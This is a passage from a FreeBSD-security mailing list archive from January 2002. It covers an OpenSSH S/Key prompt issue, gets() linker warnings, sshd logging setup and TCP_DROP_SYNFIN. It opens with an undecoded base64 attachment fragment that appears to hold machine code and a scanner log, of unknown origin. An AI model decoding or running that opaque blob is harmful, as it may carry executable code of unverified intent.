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 HjPE+TPG+MOYM8Ho8f///zE+g+oB+MHPRIHHG6hEwCvFi8YFBAAAAJbBwCTWM8BIA8J4BenX//// I8Vhi8LDb24gICAgIDogRW5kYWJsZWQNCjcvMjMvMDEJMTI6MzYgUE0JU2NhbiBTZXR0aW5ncwkJ RGlzcGxheSBjb250aW51ZSBidXR0b24gOiBEaXNhYmxlZA0KNy8yMy8wMQkxMjozNiBQTQlTY2Fu IFNldHRpbmdzCQlEaXNwbGF5IGN1c3RvbSBtZXNzYWdlICA6IERpc2FibGVkDQo3LzIzLzAxCTEy OjM2IFBNCVNjYW4gU2V0dGluZ3MJQWxlcnQgT3B0aW9ucw0KNy8yMy8wMQkxMjozNiBQTQlTY2Fu IFNldHRpbmdzCQlOZXR3b3JrIGFsZXJ0IHBhdGggICAgICA6IA0KNy8yMy8wMQkxMjozNiBQTQlT Y2FuIFNldHRpbmdzCQlTZW5kIG5ldHdvcmsgYWxlcnRzICAgICA6IERpc2FibGVkDQo3LzIzLzAx CTEyOjM2IFBNCVNjYW4gU2V0dGluZ3MJCVNlbmQgRE1JIGFsZXJ0IG1lc3NhZ2VzIDogRGlzYWJs ZWQNCjcvMjMvMDEJMTI6MzYgUE0JU2NhbiBTZXR0aW5ncwkJU291bmQgYXVkaWJsZSBhbGVydCAg ICAgOiA= ------=_NextPart_000_00D1_016D2E25.CC2E2570 Content-Type: image/gif; name="CARDBACK.GIF" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="CARDBACK.GIF" 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 k3jNayQiwIm++vWvgA2sYAdL2EUEAgA7 ------=_NextPart_000_00D1_016D2E25.CC2E2570-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 15 6:55:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from crimelords.org (crimelords.org [199.233.213.8]) by hub.freebsd.org (Postfix) with ESMTP id 13D8637B41A for ; Tue, 15 Jan 2002 06:55:23 -0800 (PST) Received: from localhost (admin@localhost) by crimelords.org (8.11.6/8.11.6) with ESMTP id g0FEm7l93937 for ; Tue, 15 Jan 2002 08:48:07 -0600 (CST) (envelope-from admin@crimelords.org) Date: Tue, 15 Jan 2002 08:48:07 -0600 (CST) From: admin To: freebsd-security@FreeBSD.ORG Subject: Openssh btwn linux/bsd.. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I ran into an issue (from only one slackware box) with S/Key authentication, wondered if anyone else sees this. The owner of the other box sent the question to openssh and the following is the answer.. -------------------------------------------------------------------------- > The above version of OpenSSH seems to work fine most of the time, but >when > I connect to one server in particular I get a very odd looking login > prompt: > > pts/0::mugz!xm[~] ssh -l mugz > otp-md5 414 cr6003 ext > S/Key Password: > otp-md5 265 cr4395 ext > S/Key Password: > otp-md5 332 cr9989 ext > S/Key Password: > user@host-name-omitted password: > > I enter my password 3 times in a row at this prompt, and then i get a > "normal" login prompt and can login, whats up with this? ssh -o preferredauthentications=password This is (at least) caused by the fact that FreeBSD people have broken all setups without skey in use. It happened a few months ago with their FTP daemon, now it's happening with sshd. -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords ------------------------------------------------------------------------ The freebsd is running : SSH Version OpenSSH_2.3.0 FreeBSD localisations 20010713, protocol versions 1.5/2.0. Compiled with SSL (0x0090601f). The slack box is running : OpenSSH_3.0.2p1, SSH protocols 1.5/2.0, OpenSSL 0x0090601f Just a heads up if your users start asking about this, plus wanted to see if anyone had come across this before? --emacs To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 15 8:22:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 39BEA37B41F for ; Tue, 15 Jan 2002 08:22:32 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.6/8.11.4) id g0FGMGq00819; Tue, 15 Jan 2002 08:22:17 -0800 (PST) (envelope-from kris) Date: Tue, 15 Jan 2002 08:22:16 -0800 From: Kris Kennaway To: Alfred Perlstein Cc: Buliwyf McGraw , freebsd-security@FreeBSD.ORG Subject: Re: gets() is unsafe Message-ID: <20020115082216.A792@citusc17.usc.edu> References: <20020114151955.I26067@elvis.mu.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="/9DWx/yDrRhgMJTb" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020114151955.I26067@elvis.mu.org>; from bright@mu.org on Mon, Jan 14, 2002 at 03:19:55PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --/9DWx/yDrRhgMJTb Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jan 14, 2002 at 03:19:55PM -0800, Alfred Perlstein wrote: > * Buliwyf McGraw [020114 14:49] wrote: > >=20 > > Hi... i was installing several applications (php,xmms,etc) on my > > FreeBSD 4.4 server and i got the next message a lot of times when > > i was compiling: > >=20 > > /usr/lib/compat/libc.so.3: warning: mktemp() possibly used unsafely; > > consider using mkstemp() > > /usr/lib/compat/libc.so.3: warning: tmpnam() possibly used unsafely; > > consider using mkstemp() > > /usr/lib/compat/libc.so.3: warning: this program uses gets(), which is > > unsafe. > > /usr/lib/compat/libc.so.3: WARNING! setkey(3) not present in the syste= m! > > /usr/lib/compat/libc.so.3: WARNING! des_setkey(3) not present in the > > system! > > /usr/lib/compat/libc.so.3: WARNING! encrypt(3) not present in the syst= em! > > /usr/lib/compat/libc.so.3: WARNING! des_cipher(3) not present in the > > system! > > /usr/lib/compat/libc.so.3: warning: this program uses f_prealloc(), whi= ch > > is not recommended. > >=20 > > I want to fix this... what i can do? > > Thanks for any help. >=20 > Read the manpages, use the "Safer" version of the functions. No, this is a FAQ; it's a bug in the linker which causes it to trip every single _warn_references() in the library when it links to libc, regardless of whether the program actually uses the functions in question. Kris --/9DWx/yDrRhgMJTb Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE8RFc3Wry0BWjoQKURAs5kAJ9EsNbWKiRn6CK2d4CkZigmqHySiQCg+n1I F5y0wNYgaku84gFANF+JpSo= =I5gP -----END PGP SIGNATURE----- --/9DWx/yDrRhgMJTb-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 15 8:56:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from crimelords.org (crimelords.org [199.233.213.8]) by hub.freebsd.org (Postfix) with ESMTP id 10CB237B400 for ; Tue, 15 Jan 2002 08:56:44 -0800 (PST) Received: from localhost (admin@localhost) by crimelords.org (8.11.6/8.11.6) with ESMTP id g0FGnNp94494 for ; Tue, 15 Jan 2002 10:49:23 -0600 (CST) (envelope-from admin@crimelords.org) Date: Tue, 15 Jan 2002 10:49:23 -0600 (CST) From: admin To: freebsd-security@FreeBSD.ORG Subject: Logging ssh?? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm trying to get failed log-in attempts setup to go to my syslog or messages file (/var/log) and have had zero success. Openssh 2.9 on freeBSD4.4 stable I must be missing something in the syslog.conf, so i put in the line *.*,cron.none /var/log/syslog no spaces, only tabs...then 'touch /var/log/syslog' I then tail the syslog file and fail to log in from 3 sources outside and see nothing. sshd_config loggin settings have been from default of # Logging SyslogFacility AUTH LogLevel INFO I then tried: # Logging SyslogFacility AUTH LogLevel VERBOSE I then tried: # Logging SyslogFacility AUTH LogLevel DEBUG Not sure what it is i'm missing. I've HUP'ed every service, and read what I could, but it sitll fails to log. Is this not a feature? or am I just missing something simple? --emacs To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 15 9:53:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from squall.waterspout.com (squall.waterspout.com [208.13.56.12]) by hub.freebsd.org (Postfix) with ESMTP id BD6D337B405 for ; Tue, 15 Jan 2002 09:53:08 -0800 (PST) Received: by squall.waterspout.com (Postfix, from userid 1050) id 5BF709B19; Tue, 15 Jan 2002 12:52:57 -0500 (EST) Date: Tue, 15 Jan 2002 12:52:57 -0500 From: Will Andrews To: admin Cc: freebsd-security@FreeBSD.ORG Subject: Re: Openssh btwn linux/bsd.. Message-ID: <20020115125257.C73815@squall.waterspout.com> Reply-To: Will Andrews Mail-Followup-To: admin , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.22.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jan 15, 2002 at 08:48:07AM -0600, admin wrote: > I ran into an issue (from only one slackware box) with S/Key > authentication, wondered if anyone else sees this. The owner of the other > box sent the question to openssh and the following is the answer.. # Uncomment to disable s/key passwords ChallengeResponseAuthentication no Use this in sshd_config if you do not use s/key. -- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 15 10:39:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id DA6C537B405 for ; Tue, 15 Jan 2002 10:39:43 -0800 (PST) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.11.4/8.11.4) id g0FIdex59177; Tue, 15 Jan 2002 13:39:40 -0500 (EST) (envelope-from wollman) Date: Tue, 15 Jan 2002 13:39:40 -0500 (EST) From: Garrett Wollman Message-Id: <200201151839.g0FIdex59177@khavrinen.lcs.mit.edu> To: Dag-Erling Smorgrav Cc: freebsd-security@FreeBSD.ORG Subject: Re: options TCP_DROP_SYNFIN In-Reply-To: References: <20011217073102.GA94480@noname> <20011217185456.A34365@raven.robbins.dropbear.id.au> <200112171803.fBHI3kA35513@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > Garrett Wollman writes: >> [...] DES and I have discussed a more appropriate behavior for >> this option which does not violate the TCP standard. > ...but we never arrived at a definite conclusion. I thought we had. Must have crossed wires or something. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 15 14:10:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from falcon.prod.itd.earthlink.net (falcon.mail.pas.earthlink.net [207.217.120.74]) by hub.freebsd.org (Postfix) with ESMTP id 1C7D337B402 for ; Tue, 15 Jan 2002 14:10:22 -0800 (PST) Received: from dialup-209.245.128.158.dial1.sanjose1.level3.net ([209.245.128.158] helo=blossom.cjclark.org) by falcon.prod.itd.earthlink.net with esmtp (Exim 3.33 #1) id 16QbmV-0002ht-00; Tue, 15 Jan 2002 14:10:12 -0800 Received: (from cjc@localhost) by blossom.cjclark.org (8.11.6/8.11.3) id g0FM9b432429; Tue, 15 Jan 2002 14:09:37 -0800 (PST) (envelope-from cjc) Date: Tue, 15 Jan 2002 14:09:28 -0800 From: "Crist J . Clark" To: admin Cc: freebsd-security@FreeBSD.ORG Subject: Re: Logging ssh?? Message-ID: <20020115140928.B31328@blossom.cjclark.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from admin@crimelords.org on Tue, Jan 15, 2002 at 10:49:23AM -0600 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Jan 15, 2002 at 10:49:23AM -0600, admin wrote: > I'm trying to get failed log-in attempts setup to go to my syslog or > messages file (/var/log) and have had zero success. Openssh 2.9 on > freeBSD4.4 stable > > I must be missing something in the syslog.conf, so i put in the line > > *.*,cron.none /var/log/syslog > > no spaces, only tabs...then 'touch /var/log/syslog' Always post the _whole_ syslog.conf(5). Location in the file may be important. For example, if you stuck this at the bottom of the default syslog.conf(5) distributed 